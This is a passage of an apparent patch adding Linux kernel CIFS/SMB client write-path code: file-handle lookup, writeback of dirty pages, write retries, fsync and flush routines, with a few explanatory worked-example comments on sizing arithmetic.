++			spin_unlock(&d_inode(dentry)->i_lock);
++			*offset += bytes_written;
++		}
++	}
++
++	cifs_stats_bytes_written(tcon, total_written);
++
++	if (total_written > 0) {
++		spin_lock(&d_inode(dentry)->i_lock);
++		if (*offset > d_inode(dentry)->i_size) {
++			i_size_write(d_inode(dentry), *offset);
++			d_inode(dentry)->i_blocks = (512 - 1 + *offset) >> 9;
++		}
++		spin_unlock(&d_inode(dentry)->i_lock);
++	}
++	mark_inode_dirty_sync(d_inode(dentry));
++	free_xid(xid);
++	return total_written;
++}
++
++struct cifsFileInfo *find_readable_file(struct cifsInodeInfo *cifs_inode,
++					bool fsuid_only)
++{
++	struct cifsFileInfo *open_file = NULL;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(cifs_inode->netfs.inode.i_sb);
++
++	/* only filter by fsuid on multiuser mounts */
++	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MULTIUSER))
++		fsuid_only = false;
++
++	spin_lock(&cifs_inode->open_file_lock);
++	/*
++	 * We could simply take the first list entry, since write-only
++	 * entries are always at the end of the list, but the first entry
++	 * might have a close pending, so we go through the whole list.
++	 */
++	list_for_each_entry(open_file, &cifs_inode->openFileList, flist) {
++		if (fsuid_only && !uid_eq(open_file->uid, current_fsuid()))
++			continue;
++		if (OPEN_FMODE(open_file->f_flags) & FMODE_READ) {
++			if (!open_file->invalidHandle) {
++				/* found a good file */
++				/* lock it so it will not be closed on us */
++				cifsFileInfo_get(open_file);
++				spin_unlock(&cifs_inode->open_file_lock);
++				return open_file;
++			} /* else might as well continue, and look for
++			     another, or simply have the caller reopen it
++			     again rather than trying to fix this handle */
++		} else /* write only file */
++			break; /* write only files are last so must be done */
++	}
++	spin_unlock(&cifs_inode->open_file_lock);
++	return NULL;
++}
++
++/* Return -EBADF if no handle is found and general rc otherwise */
++int
++cifs_get_writable_file(struct cifsInodeInfo *cifs_inode, int flags,
++		       struct cifsFileInfo **ret_file)
++{
++	struct cifsFileInfo *open_file, *inv_file = NULL;
++	struct cifs_sb_info *cifs_sb;
++	bool any_available = false;
++	int rc = -EBADF;
++	unsigned int refind = 0;
++	bool fsuid_only = flags & FIND_WR_FSUID_ONLY;
++	bool with_delete = flags & FIND_WR_WITH_DELETE;
++	*ret_file = NULL;
++
++	/*
++	 * Having a null inode here (because mapping->host was set to zero by
++	 * the VFS or MM) should not happen, but we had reports of an oops
++	 * (due to it being zero) during stress test cases, so we need to
++	 * check for it.
++	 */
++
++	if (cifs_inode == NULL) {
++		cifs_dbg(VFS, "Null inode passed to cifs_writeable_file\n");
++		dump_stack();
++		return rc;
++	}
++
++	cifs_sb = CIFS_SB(cifs_inode->netfs.inode.i_sb);
++
++	/* only filter by fsuid on multiuser mounts */
++	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MULTIUSER))
++		fsuid_only = false;
++
++	spin_lock(&cifs_inode->open_file_lock);
++refind_writable:
++	if (refind > MAX_REOPEN_ATT) {
++		spin_unlock(&cifs_inode->open_file_lock);
++		return rc;
++	}
++	list_for_each_entry(open_file, &cifs_inode->openFileList, flist) {
++		if (!any_available && open_file->pid != current->tgid)
++			continue;
++		if (fsuid_only && !uid_eq(open_file->uid, current_fsuid()))
++			continue;
++		if (with_delete && !(open_file->fid.access & DELETE))
++			continue;
++		if (OPEN_FMODE(open_file->f_flags) & FMODE_WRITE) {
++			if (!open_file->invalidHandle) {
++				/* found a good writable file */
++				cifsFileInfo_get(open_file);
++				spin_unlock(&cifs_inode->open_file_lock);
++				*ret_file = open_file;
++				return 0;
++			} else {
++				if (!inv_file)
++					inv_file = open_file;
++			}
++		}
++	}
++	/* couldn't find a usable FH with the same pid, try any available */
++	if (!any_available) {
++		any_available = true;
++		goto refind_writable;
++	}
++
++	if (inv_file) {
++		any_available = false;
++		cifsFileInfo_get(inv_file);
++	}
++
++	spin_unlock(&cifs_inode->open_file_lock);
++
++	if (inv_file) {
++		rc = cifs_reopen_file(inv_file, false);
++		if (!rc) {
++			*ret_file = inv_file;
++			return 0;
++		}
++
++		spin_lock(&cifs_inode->open_file_lock);
++		list_move_tail(&inv_file->flist, &cifs_inode->openFileList);
++		spin_unlock(&cifs_inode->open_file_lock);
++		cifsFileInfo_put(inv_file);
++		++refind;
++		inv_file = NULL;
++		spin_lock(&cifs_inode->open_file_lock);
++		goto refind_writable;
++	}
++
++	return rc;
++}
++
++struct cifsFileInfo *
++find_writable_file(struct cifsInodeInfo *cifs_inode, int flags)
++{
++	struct cifsFileInfo *cfile;
++	int rc;
++
++	rc = cifs_get_writable_file(cifs_inode, flags, &cfile);
++	if (rc)
++		cifs_dbg(FYI, "Couldn't find writable handle rc=%d\n", rc);
++
++	return cfile;
++}
++
++int
++cifs_get_writable_path(struct cifs_tcon *tcon, const char *name,
++		       int flags,
++		       struct cifsFileInfo **ret_file)
++{
++	struct cifsFileInfo *cfile;
++	void *page = alloc_dentry_path();
++
++	*ret_file = NULL;
++
++	spin_lock(&tcon->open_file_lock);
++	list_for_each_entry(cfile, &tcon->openFileList, tlist) {
++		struct cifsInodeInfo *cinode;
++		const char *full_path = build_path_from_dentry(cfile->dentry, page);
++		if (IS_ERR(full_path)) {
++			spin_unlock(&tcon->open_file_lock);
++			free_dentry_path(page);
++			return PTR_ERR(full_path);
++		}
++		if (strcmp(full_path, name))
++			continue;
++
++		cinode = CIFS_I(d_inode(cfile->dentry));
++		spin_unlock(&tcon->open_file_lock);
++		free_dentry_path(page);
++		return cifs_get_writable_file(cinode, flags, ret_file);
++	}
++
++	spin_unlock(&tcon->open_file_lock);
++	free_dentry_path(page);
++	return -ENOENT;
++}
++
++int
++cifs_get_readable_path(struct cifs_tcon *tcon, const char *name,
++		       struct cifsFileInfo **ret_file)
++{
++	struct cifsFileInfo *cfile;
++	void *page = alloc_dentry_path();
++
++	*ret_file = NULL;
++
++	spin_lock(&tcon->open_file_lock);
++	list_for_each_entry(cfile, &tcon->openFileList, tlist) {
++		struct cifsInodeInfo *cinode;
++		const char *full_path = build_path_from_dentry(cfile->dentry, page);
++		if (IS_ERR(full_path)) {
++			spin_unlock(&tcon->open_file_lock);
++			free_dentry_path(page);
++			return PTR_ERR(full_path);
++		}
++		if (strcmp(full_path, name))
++			continue;
++
++		cinode = CIFS_I(d_inode(cfile->dentry));
++		spin_unlock(&tcon->open_file_lock);
++		free_dentry_path(page);
++		*ret_file = find_readable_file(cinode, 0);
++		return *ret_file ? 0 : -ENOENT;
++	}
++
++	spin_unlock(&tcon->open_file_lock);
++	free_dentry_path(page);
++	return -ENOENT;
++}
++
++void
++cifs_writedata_release(struct kref *refcount)
++{
++	struct cifs_writedata *wdata = container_of(refcount,
++					struct cifs_writedata, refcount);
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	if (wdata->mr) {
++		smbd_deregister_mr(wdata->mr);
++		wdata->mr = NULL;
++	}
++#endif
++
++	if (wdata->cfile)
++		cifsFileInfo_put(wdata->cfile);
++
++	kvfree(wdata->pages);
++	kfree(wdata);
++}
++
++/*
++ * Write failed with a retryable error. Resend the write request. It's also
++ * possible that the page was redirtied so re-clean the page.
++ */
++static void
++cifs_writev_requeue(struct cifs_writedata *wdata)
++{
++	int i, rc = 0;
++	struct inode *inode = d_inode(wdata->cfile->dentry);
++	struct TCP_Server_Info *server;
++	unsigned int rest_len;
++
++	server = tlink_tcon(wdata->cfile->tlink)->ses->server;
++	i = 0;
++	rest_len = wdata->bytes;
++	do {
++		struct cifs_writedata *wdata2;
++		unsigned int j, nr_pages, wsize, tailsz, cur_len;
++
++		wsize = server->ops->wp_retry_size(inode);
++		if (wsize < rest_len) {
++			nr_pages = wsize / PAGE_SIZE;
++			if (!nr_pages) {
++				rc = -EOPNOTSUPP;
++				break;
++			}
++			cur_len = nr_pages * PAGE_SIZE;
++			tailsz = PAGE_SIZE;
++		} else {
++			nr_pages = DIV_ROUND_UP(rest_len, PAGE_SIZE);
++			cur_len = rest_len;
++			tailsz = rest_len - (nr_pages - 1) * PAGE_SIZE;
++		}
++
++		wdata2 = cifs_writedata_alloc(nr_pages, cifs_writev_complete);
++		if (!wdata2) {
++			rc = -ENOMEM;
++			break;
++		}
++
++		for (j = 0; j < nr_pages; j++) {
++			wdata2->pages[j] = wdata->pages[i + j];
++			lock_page(wdata2->pages[j]);
++			clear_page_dirty_for_io(wdata2->pages[j]);
++		}
++
++		wdata2->sync_mode = wdata->sync_mode;
++		wdata2->nr_pages = nr_pages;
++		wdata2->offset = page_offset(wdata2->pages[0]);
++		wdata2->pagesz = PAGE_SIZE;
++		wdata2->tailsz = tailsz;
++		wdata2->bytes = cur_len;
++
++		rc = cifs_get_writable_file(CIFS_I(inode), FIND_WR_ANY,
++					    &wdata2->cfile);
++		if (!wdata2->cfile) {
++			cifs_dbg(VFS, "No writable handle to retry writepages rc=%d\n",
++				 rc);
++			if (!is_retryable_error(rc))
++				rc = -EBADF;
++		} else {
++			wdata2->pid = wdata2->cfile->pid;
++			rc = server->ops->async_writev(wdata2,
++						       cifs_writedata_release);
++		}
++
++		for (j = 0; j < nr_pages; j++) {
++			unlock_page(wdata2->pages[j]);
++			if (rc != 0 && !is_retryable_error(rc)) {
++				SetPageError(wdata2->pages[j]);
++				end_page_writeback(wdata2->pages[j]);
++				put_page(wdata2->pages[j]);
++			}
++		}
++
++		kref_put(&wdata2->refcount, cifs_writedata_release);
++		if (rc) {
++			if (is_retryable_error(rc))
++				continue;
++			i += nr_pages;
++			break;
++		}
++
++		rest_len -= cur_len;
++		i += nr_pages;
++	} while (i < wdata->nr_pages);
++
++	/* cleanup remaining pages from the original wdata */
++	for (; i < wdata->nr_pages; i++) {
++		SetPageError(wdata->pages[i]);
++		end_page_writeback(wdata->pages[i]);
++		put_page(wdata->pages[i]);
++	}
++
++	if (rc != 0 && !is_retryable_error(rc))
++		mapping_set_error(inode->i_mapping, rc);
++	kref_put(&wdata->refcount, cifs_writedata_release);
++}
++
++void
++cifs_writev_complete(struct work_struct *work)
++{
++	struct cifs_writedata *wdata = container_of(work,
++						struct cifs_writedata, work);
++	struct inode *inode = d_inode(wdata->cfile->dentry);
++	int i = 0;
++
++	if (wdata->result == 0) {
++		spin_lock(&inode->i_lock);
++		cifs_update_eof(CIFS_I(inode), wdata->offset, wdata->bytes);
++		spin_unlock(&inode->i_lock);
++		cifs_stats_bytes_written(tlink_tcon(wdata->cfile->tlink),
++					 wdata->bytes);
++	} else if (wdata->sync_mode == WB_SYNC_ALL && wdata->result == -EAGAIN)
++		return cifs_writev_requeue(wdata);
++
++	for (i = 0; i < wdata->nr_pages; i++) {
++		struct page *page = wdata->pages[i];
++
++		if (wdata->result == -EAGAIN)
++			__set_page_dirty_nobuffers(page);
++		else if (wdata->result < 0)
++			SetPageError(page);
++		end_page_writeback(page);
++		cifs_readpage_to_fscache(inode, page);
++		put_page(page);
++	}
++	if (wdata->result != -EAGAIN)
++		mapping_set_error(inode->i_mapping, wdata->result);
++	kref_put(&wdata->refcount, cifs_writedata_release);
++}
++
++struct cifs_writedata *
++cifs_writedata_alloc(unsigned int nr_pages, work_func_t complete)
++{
++	struct cifs_writedata *writedata = NULL;
++	struct page **pages =
++		kcalloc(nr_pages, sizeof(struct page *), GFP_NOFS);
++	if (pages) {
++		writedata = cifs_writedata_direct_alloc(pages, complete);
++		if (!writedata)
++			kvfree(pages);
++	}
++
++	return writedata;
++}
++
++struct cifs_writedata *
++cifs_writedata_direct_alloc(struct page **pages, work_func_t complete)
++{
++	struct cifs_writedata *wdata;
++
++	wdata = kzalloc(sizeof(*wdata), GFP_NOFS);
++	if (wdata != NULL) {
++		wdata->pages = pages;
++		kref_init(&wdata->refcount);
++		INIT_LIST_HEAD(&wdata->list);
++		init_completion(&wdata->done);
++		INIT_WORK(&wdata->work, complete);
++	}
++	return wdata;
++}
++
++static int cifs_partialpagewrite(struct page *page, unsigned from, unsigned to)
++{
++	struct address_space *mapping = page->mapping;
++	loff_t offset = (loff_t)page->index << PAGE_SHIFT;
++	char *write_data;
++	int rc = -EFAULT;
++	int bytes_written = 0;
++	struct inode *inode;
++	struct cifsFileInfo *open_file;
++
++	if (!mapping || !mapping->host)
++		return -EFAULT;
++
++	inode = page->mapping->host;
++
++	offset += (loff_t)from;
++	write_data = kmap(page);
++	write_data += from;
++
++	if ((to > PAGE_SIZE) || (from > to)) {
++		kunmap(page);
++		return -EIO;
++	}
++
++	/* racing with truncate? */
++	if (offset > mapping->host->i_size) {
++		kunmap(page);
++		return 0; /* don't care */
++	}
++
++	/* check to make sure that we are not extending the file */
++	if (mapping->host->i_size - offset < (loff_t)to)
++		to = (unsigned)(mapping->host->i_size - offset);
++
++	rc = cifs_get_writable_file(CIFS_I(mapping->host), FIND_WR_ANY,
++				    &open_file);
++	if (!rc) {
++		bytes_written = cifs_write(open_file, open_file->pid,
++					   write_data, to - from, &offset);
++		cifsFileInfo_put(open_file);
++		/* Does mm or vfs already set times? */
++		inode->i_atime = inode->i_mtime = current_time(inode);
++		if ((bytes_written > 0) && (offset))
++			rc = 0;
++		else if (bytes_written < 0)
++			rc = bytes_written;
++		else
++			rc = -EFAULT;
++	} else {
++		cifs_dbg(FYI, "No writable handle for write page rc=%d\n", rc);
++		if (!is_retryable_error(rc))
++			rc = -EIO;
++	}
++
++	kunmap(page);
++	return rc;
++}
++
++static struct cifs_writedata *
++wdata_alloc_and_fillpages(pgoff_t tofind, struct address_space *mapping,
++			  pgoff_t end, pgoff_t *index,
++			  unsigned int *found_pages)
++{
++	struct cifs_writedata *wdata;
++
++	wdata = cifs_writedata_alloc((unsigned int)tofind,
++				     cifs_writev_complete);
++	if (!wdata)
++		return NULL;
++
++	*found_pages = find_get_pages_range_tag(mapping, index, end,
++				PAGECACHE_TAG_DIRTY, tofind, wdata->pages);
++	return wdata;
++}
++
++static unsigned int
++wdata_prepare_pages(struct cifs_writedata *wdata, unsigned int found_pages,
++		    struct address_space *mapping,
++		    struct writeback_control *wbc,
++		    pgoff_t end, pgoff_t *index, pgoff_t *next, bool *done)
++{
++	unsigned int nr_pages = 0, i;
++	struct page *page;
++
++	for (i = 0; i < found_pages; i++) {
++		page = wdata->pages[i];
++		/*
++		 * At this point we hold neither the i_pages lock nor the
++		 * page lock: the page may be truncated or invalidated
++		 * (changing page->mapping to NULL), or even swizzled
++		 * back from swapper_space to tmpfs file mapping
++		 */
++
++		if (nr_pages == 0)
++			lock_page(page);
++		else if (!trylock_page(page))
++			break;
++
++		if (unlikely(page->mapping != mapping)) {
++			unlock_page(page);
++			break;
++		}
++
++		if (!wbc->range_cyclic && page->index > end) {
++			*done = true;
++			unlock_page(page);
++			break;
++		}
++
++		if (*next && (page->index != *next)) {
++			/* Not next consecutive page */
++			unlock_page(page);
++			break;
++		}
++
++		if (wbc->sync_mode != WB_SYNC_NONE)
++			wait_on_page_writeback(page);
++
++		if (PageWriteback(page) ||
++				!clear_page_dirty_for_io(page)) {
++			unlock_page(page);
++			break;
++		}
++
++		/*
++		 * This actually clears the dirty bit in the radix tree.
++		 * See cifs_writepage() for more commentary.
++		 */
++		set_page_writeback(page);
++		if (page_offset(page) >= i_size_read(mapping->host)) {
++			*done = true;
++			unlock_page(page);
++			end_page_writeback(page);
++			break;
++		}
++
++		wdata->pages[i] = page;
++		*next = page->index + 1;
++		++nr_pages;
++	}
++
++	/* reset index to refind any pages skipped */
++	if (nr_pages == 0)
++		*index = wdata->pages[0]->index + 1;
++
++	/* put any pages we aren't going to use */
++	for (i = nr_pages; i < found_pages; i++) {
++		put_page(wdata->pages[i]);
++		wdata->pages[i] = NULL;
++	}
++
++	return nr_pages;
++}
++
++static int
++wdata_send_pages(struct cifs_writedata *wdata, unsigned int nr_pages,
++		 struct address_space *mapping, struct writeback_control *wbc)
++{
++	int rc;
++
++	wdata->sync_mode = wbc->sync_mode;
++	wdata->nr_pages = nr_pages;
++	wdata->offset = page_offset(wdata->pages[0]);
++	wdata->pagesz = PAGE_SIZE;
++	wdata->tailsz = min(i_size_read(mapping->host) -
++			page_offset(wdata->pages[nr_pages - 1]),
++			(loff_t)PAGE_SIZE);
++	wdata->bytes = ((nr_pages - 1) * PAGE_SIZE) + wdata->tailsz;
++	wdata->pid = wdata->cfile->pid;
++
++	rc = adjust_credits(wdata->server, &wdata->credits, wdata->bytes);
++	if (rc)
++		return rc;
++
++	if (wdata->cfile->invalidHandle)
++		rc = -EAGAIN;
++	else
++		rc = wdata->server->ops->async_writev(wdata,
++						      cifs_writedata_release);
++
++	return rc;
++}
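++
++/*
++ * Illustrative sizing example for wdata_send_pages(), assuming 4 KiB
++ * pages: with nr_pages = 3, the last page starting at offset 8192 and
++ * i_size = 8292, tailsz = min(8292 - 8192, 4096) = 100, so
++ * wdata->bytes = 2 * 4096 + 100 = 8292 -- full pages plus the tail.
++ */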
++
++static int cifs_writepages(struct address_space *mapping,
++			   struct writeback_control *wbc)
++{
++	struct inode *inode = mapping->host;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct TCP_Server_Info *server;
++	bool done = false, scanned = false, range_whole = false;
++	pgoff_t end, index;
++	struct cifs_writedata *wdata;
++	struct cifsFileInfo *cfile = NULL;
++	int rc = 0;
++	int saved_rc = 0;
++	unsigned int xid;
++
++	/*
++	 * If wsize is smaller than the page cache size, default to writing
++	 * one page at a time via cifs_writepage
++	 */
++	if (cifs_sb->ctx->wsize < PAGE_SIZE)
++		return generic_writepages(mapping, wbc);
++
++	xid = get_xid();
++	if (wbc->range_cyclic) {
++		index = mapping->writeback_index; /* Start from prev offset */
++		end = -1;
++	} else {
++		index = wbc->range_start >> PAGE_SHIFT;
++		end = wbc->range_end >> PAGE_SHIFT;
++		if (wbc->range_start == 0 && wbc->range_end == LLONG_MAX)
++			range_whole = true;
++		scanned = true;
++	}
++	server = cifs_pick_channel(cifs_sb_master_tcon(cifs_sb)->ses);
++
++retry:
++	while (!done && index <= end) {
++		unsigned int i, nr_pages, found_pages, wsize;
++		pgoff_t next = 0, tofind, saved_index = index;
++		struct cifs_credits credits_on_stack;
++		struct cifs_credits *credits = &credits_on_stack;
++		int get_file_rc = 0;
++
++		if (cfile)
++			cifsFileInfo_put(cfile);
++
++		rc = cifs_get_writable_file(CIFS_I(inode), FIND_WR_ANY, &cfile);
++
++		/* in case of an error, store it to return later */
++		if (rc)
++			get_file_rc = rc;
++
++		rc = server->ops->wait_mtu_credits(server, cifs_sb->ctx->wsize,
++						   &wsize, credits);
++		if (rc != 0) {
++			done = true;
++			break;
++		}
++
++		tofind = min((wsize / PAGE_SIZE) - 1, end - index) + 1;
++
++		wdata = wdata_alloc_and_fillpages(tofind, mapping, end, &index,
++						  &found_pages);
++		if (!wdata) {
++			rc = -ENOMEM;
++			done = true;
++			add_credits_and_wake_if(server, credits, 0);
++			break;
++		}
++
++		if (found_pages == 0) {
++			kref_put(&wdata->refcount, cifs_writedata_release);
++			add_credits_and_wake_if(server, credits, 0);
++			break;
++		}
++
++		nr_pages = wdata_prepare_pages(wdata, found_pages, mapping, wbc,
++					       end, &index, &next, &done);
++
++		/* nothing to write? */
++		if (nr_pages == 0) {
++			kref_put(&wdata->refcount, cifs_writedata_release);
++			add_credits_and_wake_if(server, credits, 0);
++			continue;
++		}
++
++		wdata->credits = credits_on_stack;
++		wdata->cfile = cfile;
++		wdata->server = server;
++		cfile = NULL;
++
++		if (!wdata->cfile) {
++			cifs_dbg(VFS, "No writable handle in writepages rc=%d\n",
++				 get_file_rc);
++			if (is_retryable_error(get_file_rc))
++				rc = get_file_rc;
++			else
++				rc = -EBADF;
++		} else
++			rc = wdata_send_pages(wdata, nr_pages, mapping, wbc);
++
++		for (i = 0; i < nr_pages; ++i)
++			unlock_page(wdata->pages[i]);
++
++		/* send failure -- clean up the mess */
++		if (rc != 0) {
++			add_credits_and_wake_if(server, &wdata->credits, 0);
++			for (i = 0; i < nr_pages; ++i) {
++				if (is_retryable_error(rc))
++					redirty_page_for_writepage(wbc,
++							   wdata->pages[i]);
++				else
++					SetPageError(wdata->pages[i]);
++				end_page_writeback(wdata->pages[i]);
++				put_page(wdata->pages[i]);
++			}
++			if (!is_retryable_error(rc))
++				mapping_set_error(mapping, rc);
++		}
++		kref_put(&wdata->refcount, cifs_writedata_release);
++
++		if (wbc->sync_mode == WB_SYNC_ALL && rc == -EAGAIN) {
++			index = saved_index;
++			continue;
++		}
++
++		/* Return immediately if we received a signal during writing */
++		if (is_interrupt_error(rc)) {
++			done = true;
++			break;
++		}
++
++		if (rc != 0 && saved_rc == 0)
++			saved_rc = rc;
++
++		wbc->nr_to_write -= nr_pages;
++		if (wbc->nr_to_write <= 0)
++			done = true;
++
++		index = next;
++	}
++
++	if (!scanned && !done) {
++		/*
++		 * We hit the last page and there is more work to be done: wrap
++		 * back to the start of the file
++		 */
++		scanned = true;
++		index = 0;
++		goto retry;
++	}
++
++	if (saved_rc != 0)
++		rc = saved_rc;
++
++	if (wbc->range_cyclic || (range_whole && wbc->nr_to_write > 0))
++		mapping->writeback_index = index;
++
++	if (cfile)
++		cifsFileInfo_put(cfile);
++	free_xid(xid);
++	/* Indicate that ctime and mtime must be updated, as close is deferred */
++	set_bit(CIFS_INO_MODIFIED_ATTR, &CIFS_I(inode)->flags);
++	return rc;
++}
++
++static int
++cifs_writepage_locked(struct page *page, struct writeback_control *wbc)
++{
++	int rc;
++	unsigned int xid;
++
++	xid = get_xid();
++/* BB add check for wbc flags */
++	get_page(page);
++	if (!PageUptodate(page))
++		cifs_dbg(FYI, "ppw - page not up to date\n");
++
++	/*
++	 * Set the "writeback" flag, and clear "dirty" in the radix tree.
++	 *
++	 * A writepage() implementation always needs to do either this,
++	 * or re-dirty the page with "redirty_page_for_writepage()" in
++	 * the case of a failure.
++	 *
++	 * Just unlocking the page will cause the radix tree tag-bits
++	 * to fall out of sync with the state of the page.
++	 */
++	set_page_writeback(page);
++retry_write:
++	rc = cifs_partialpagewrite(page, 0, PAGE_SIZE);
++	if (is_retryable_error(rc)) {
++		if (wbc->sync_mode == WB_SYNC_ALL && rc == -EAGAIN)
++			goto retry_write;
++		redirty_page_for_writepage(wbc, page);
++	} else if (rc != 0) {
++		SetPageError(page);
++		mapping_set_error(page->mapping, rc);
++	} else {
++		SetPageUptodate(page);
++	}
++	end_page_writeback(page);
++	put_page(page);
++	free_xid(xid);
++	return rc;
++}
++
++static int cifs_writepage(struct page *page, struct writeback_control *wbc)
++{
++	int rc = cifs_writepage_locked(page, wbc);
++	unlock_page(page);
++	return rc;
++}
++
++static int cifs_write_end(struct file *file, struct address_space *mapping,
++			loff_t pos, unsigned len, unsigned copied,
++			struct page *page, void *fsdata)
++{
++	int rc;
++	struct inode *inode = mapping->host;
++	struct cifsFileInfo *cfile = file->private_data;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(cfile->dentry->d_sb);
++	__u32 pid;
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RWPIDFORWARD)
++		pid = cfile->pid;
++	else
++		pid = current->tgid;
++
++	cifs_dbg(FYI, "write_end for page %p from pos %lld with %d bytes\n",
++		 page, pos, copied);
++
++	if (PageChecked(page)) {
++		if (copied == len)
++			SetPageUptodate(page);
++		ClearPageChecked(page);
++	} else if (!PageUptodate(page) && copied == PAGE_SIZE)
++		SetPageUptodate(page);
++
++	if (!PageUptodate(page)) {
++		char *page_data;
++		unsigned offset = pos & (PAGE_SIZE - 1);
++		unsigned int xid;
++
++		xid = get_xid();
++		/* This is probably better than calling partialpage_write
++		   directly, since the file handle is already known here and
++		   we might as well leverage it. */
++		/* BB check if anything else is missing from ppw,
++		   such as updating the last write time */
++		page_data = kmap(page);
++		rc = cifs_write(cfile, pid, page_data + offset, copied, &pos);
++		/* if (rc < 0) should we set writebehind rc? */
++		kunmap(page);
++
++		free_xid(xid);
++	} else {
++		rc = copied;
++		pos += copied;
++		set_page_dirty(page);
++	}
++
++	if (rc > 0) {
++		spin_lock(&inode->i_lock);
++		if (pos > inode->i_size) {
++			i_size_write(inode, pos);
++			inode->i_blocks = (512 - 1 + pos) >> 9;
++		}
++		spin_unlock(&inode->i_lock);
++	}
++
++	unlock_page(page);
++	put_page(page);
++	/* Indicate that ctime and mtime must be updated, as close is deferred */
++	set_bit(CIFS_INO_MODIFIED_ATTR, &CIFS_I(inode)->flags);
++
++	return rc;
++}
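++
++/*
++ * Worked example for the i_blocks update above: i_blocks is counted in
++ * 512-byte sectors, and (512 - 1 + pos) >> 9 rounds the new size up.
++ * For pos = 1000, (511 + 1000) >> 9 = 1511 >> 9 = 2 sectors (1024
++ * bytes), the smallest sector count covering the file.
++ */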
++
++int cifs_strict_fsync(struct file *file, loff_t start, loff_t end,
++		      int datasync)
++{
++	unsigned int xid;
++	int rc = 0;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++	struct cifsFileInfo *smbfile = file->private_data;
++	struct inode *inode = file_inode(file);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++
++	rc = file_write_and_wait_range(file, start, end);
++	if (rc) {
++		trace_cifs_fsync_err(inode->i_ino, rc);
++		return rc;
++	}
++
++	xid = get_xid();
++
++	cifs_dbg(FYI, "Sync file - name: %pD datasync: 0x%x\n",
++		 file, datasync);
++
++	if (!CIFS_CACHE_READ(CIFS_I(inode))) {
++		rc = cifs_zap_mapping(inode);
++		if (rc) {
++			cifs_dbg(FYI, "rc: %d during invalidate phase\n", rc);
++			rc = 0; /* don't care about it in fsync */
++		}
++	}
++
++	tcon = tlink_tcon(smbfile->tlink);
++	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOSSYNC)) {
++		server = tcon->ses->server;
++		if (server->ops->flush == NULL) {
++			rc = -ENOSYS;
++			goto strict_fsync_exit;
++		}
++
++		if ((OPEN_FMODE(smbfile->f_flags) & FMODE_WRITE) == 0) {
++			smbfile = find_writable_file(CIFS_I(inode), FIND_WR_ANY);
++			if (smbfile) {
++				rc = server->ops->flush(xid, tcon, &smbfile->fid);
++				cifsFileInfo_put(smbfile);
++			} else
++				cifs_dbg(FYI, "ignore fsync for file not open for write\n");
++		} else
++			rc = server->ops->flush(xid, tcon, &smbfile->fid);
++	}
++
++strict_fsync_exit:
++	free_xid(xid);
++	return rc;
++}
++
++int cifs_fsync(struct file *file, loff_t start, loff_t end, int datasync)
++{
++	unsigned int xid;
++	int rc = 0;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++	struct cifsFileInfo *smbfile = file->private_data;
++	struct inode *inode = file_inode(file);
++	struct cifs_sb_info *cifs_sb = CIFS_FILE_SB(file);
++
++	rc = file_write_and_wait_range(file, start, end);
++	if (rc) {
++		trace_cifs_fsync_err(file_inode(file)->i_ino, rc);
++		return rc;
++	}
++
++	xid = get_xid();
++
++	cifs_dbg(FYI, "Sync file - name: %pD datasync: 0x%x\n",
++		 file, datasync);
++
++	tcon = tlink_tcon(smbfile->tlink);
++	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOSSYNC)) {
++		server = tcon->ses->server;
++		if (server->ops->flush == NULL) {
++			rc = -ENOSYS;
++			goto fsync_exit;
++		}
++
++		if ((OPEN_FMODE(smbfile->f_flags) & FMODE_WRITE) == 0) {
++			smbfile = find_writable_file(CIFS_I(inode), FIND_WR_ANY);
++			if (smbfile) {
++				rc = server->ops->flush(xid, tcon, &smbfile->fid);
++				cifsFileInfo_put(smbfile);
++			} else
++				cifs_dbg(FYI, "ignore fsync for file not open for write\n");
++		} else
++			rc = server->ops->flush(xid, tcon, &smbfile->fid);
++	}
++
++fsync_exit:
++	free_xid(xid);
++	return rc;
++}
++
++/*
++ * As the file closes, flush all cached write data for this inode,
++ * checking for write-behind errors.
++ */
++int cifs_flush(struct file *file, fl_owner_t id)
++{
++	struct inode *inode = file_inode(file);
++	int rc = 0;
++
++	if (file->f_mode & FMODE_WRITE)
++		rc = filemap_write_and_wait(inode->i_mapping);
++
++	cifs_dbg(FYI, "Flush inode %p file %p rc %d\n", inode, file, rc);
++	if (rc) {
++		/* get more nuanced writeback errors */
++		rc = filemap_check_wb_err(file->f_mapping, 0);
++		trace_cifs_flush_err(inode->i_ino, rc);
++	}
++	return rc;
++}
++
++static int
++cifs_write_allocate_pages(struct page **pages, unsigned long num_pages)
++{
++	int rc = 0;
++	unsigned long i;
++
++	for (i = 0; i < num_pages; i++) {
++		pages[i] = alloc_page(GFP_KERNEL|__GFP_HIGHMEM);
++		if (!pages[i]) {
++			/*
++			 * save the number of pages we have already allocated
++			 * and return with an ENOMEM error
++			 */
++			num_pages = i;
++			rc = -ENOMEM;
++			break;
++		}
++	}
++
++	if (rc) {
++		for (i = 0; i < num_pages; i++)
++			put_page(pages[i]);
++	}
++	return rc;
++}
++
++static inline
++size_t get_numpages(const size_t wsize, const size_t len, size_t *cur_len)
++{
++	size_t num_pages;
++	size_t clen;
++
++	clen = min_t(const size_t, len, wsize);
++	num_pages = DIV_ROUND_UP(clen, PAGE_SIZE);
++
++	if (cur_len)
++		*cur_len = clen;
++
++	return num_pages;
++}
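++
++/*
++ * Illustrative example, assuming 4 KiB pages: for wsize = 65536 and
++ * len = 200000, clen = min(200000, 65536) = 65536, so *cur_len is set
++ * to 65536 and get_numpages() returns DIV_ROUND_UP(65536, 4096) = 16.
++ */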
++
++static void
++cifs_uncached_writedata_release(struct kref *refcount)
++{
++	int i;
++	struct cifs_writedata *wdata = container_of(refcount,
++					struct cifs_writedata, refcount);
++
++	kref_put(&wdata->ctx->refcount, cifs_aio_ctx_release);
++	for (i = 0; i < wdata->nr_pages; i++)
++		put_page(wdata->pages[i]);
++	cifs_writedata_release(refcount);
++}
++
++static void collect_uncached_write_data(struct cifs_aio_ctx *ctx);
++
++static void
